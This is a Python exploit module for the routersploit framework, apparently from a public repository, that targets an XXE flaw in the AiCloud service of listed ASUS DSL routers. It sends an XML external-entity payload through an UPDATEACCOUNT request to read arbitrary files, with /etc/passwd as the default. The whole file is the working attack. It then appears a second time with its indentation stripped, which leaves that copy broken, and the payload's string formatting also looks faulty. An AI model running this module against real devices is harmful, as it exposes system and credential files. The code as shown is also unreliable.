paralax/aicloud_xxe.py

## aicloud_xxe.py
import random
import string

from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient

class Exploit(HTTPClient):
    __info__ = {
        "name": "ASUS Router AiCloud XXE",
        "description": "Module exploits remote XXE flaw in ASUS device AiCloud service. "
                       "If the target is vulnerable, arbitrary files can be read.",
        "authors": (
            "@jnazario",  # routersploit module
        ),
        "references": (
            "https://www.securityartwork.es/2018/01/25/some-vulnerability-in-asus-routers/",
        ),
        "devices": (
            'DSL-AC51',
            'DSL-AC52U',
            'DSL-AC55U',
            'DSL-N55U C1',
            'DSL-N55U D1',
            'DSL-AC56U',
            'DSL-N10_C1',
            'DSL-N12U C1',
            'DSL-N12E C1',
            'DSL-N14U',
            'DSL-N14U-B1',
            'DSL-N16',
            'DSL-N16U',
            'DSL-N17U',
            'DSL-N66U',
            'DSL-AC750'
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(449, "Target HTTP port")

    filename = OptString("/etc/passwd", "File to read from the filesystem")

    def run(self):
        if self.check():
            print_success("Target appears to be vulnerable")

            def randomstring():
                return ''.join([ random.choice(string.hexdigits) for _ in range(random.randint(10,20))])
            identifier = randomstring()

            payload = '<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>' +\
                      '<!DOCTYPE foo [<!ENTITY %s SYSTEM "file://%s"> ]>' +\
                      '<content><id>1</id>' +\
                      '<username>TEST5&%s;</username>' +\
                      '<password>test</password>' +\
                      '<type>aicloud</type>' +\
                      '<permission></permission></content>' % (identifier, self.filename, identifier)
            response = self.http_request(
                method='UPDATEACCOUNT',
                path='/',
                data=payload
                )
            if response is None:
                print_error("Exploit failed")
                return ''
            if response.status_code == 200:
                response = self.http_request(method='GET',
                                             path='/smb/css/setting.html')
                return response.text
            return response.text
        else:
            print_error("Target is not vulnerable")

    @mute
    def check(self):
        response = self.http_request(method='GET',
                                     path='/smb/css/setting.html')
        if response is None:
            return False
        if response.status_code == 200:
            return True
        return False
	import random
	import string

	from routersploit.core.exploit import *
	from routersploit.core.http.http_client import HTTPClient

	class Exploit(HTTPClient):
	__info__ = {
	"name": "ASUS Router AiCloud XXE",
	"description": "Module exploits remote XXE flaw in ASUS device AiCloud service. "
	"If the target is vulnerable, arbitrary files can be read.",
	"authors": (
	"@jnazario", # routersploit module
	),
	"references": (
	"https://www.securityartwork.es/2018/01/25/some-vulnerability-in-asus-routers/",
	),
	"devices": (
	'DSL-AC51',
	'DSL-AC52U',
	'DSL-AC55U',
	'DSL-N55U C1',
	'DSL-N55U D1',
	'DSL-AC56U',
	'DSL-N10_C1',
	'DSL-N12U C1',
	'DSL-N12E C1',
	'DSL-N14U',
	'DSL-N14U-B1',
	'DSL-N16',
	'DSL-N16U',
	'DSL-N17U',
	'DSL-N66U',
	'DSL-AC750'
	)
	}

	target = OptIP("", "Target IPv4 or IPv6 address")
	port = OptPort(449, "Target HTTP port")

	filename = OptString("/etc/passwd", "File to read from the filesystem")

	def run(self):
	if self.check():
	print_success("Target appears to be vulnerable")

	def randomstring():
	return ''.join([ random.choice(string.hexdigits) for _ in range(random.randint(10,20))])
	identifier = randomstring()

	payload = '<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>' +\
	'<!DOCTYPE foo [<!ENTITY %s SYSTEM "file://%s"> ]>' +\
	'<content><id>1</id>' +\
	'<username>TEST5&%s;</username>' +\
	'<password>test</password>' +\
	'<type>aicloud</type>' +\
	'<permission></permission></content>' % (identifier, self.filename, identifier)
	response = self.http_request(
	method='UPDATEACCOUNT',
	path='/',
	data=payload
	)
	if response is None:
	print_error("Exploit failed")
	return ''
	if response.status_code == 200:
	response = self.http_request(method='GET',
	path='/smb/css/setting.html')
	return response.text
	return response.text
	else:
	print_error("Target is not vulnerable")

	@mute
	def check(self):
	response = self.http_request(method='GET',
	path='/smb/css/setting.html')
	if response is None:
	return False
	if response.status_code == 200:
	return True
	return False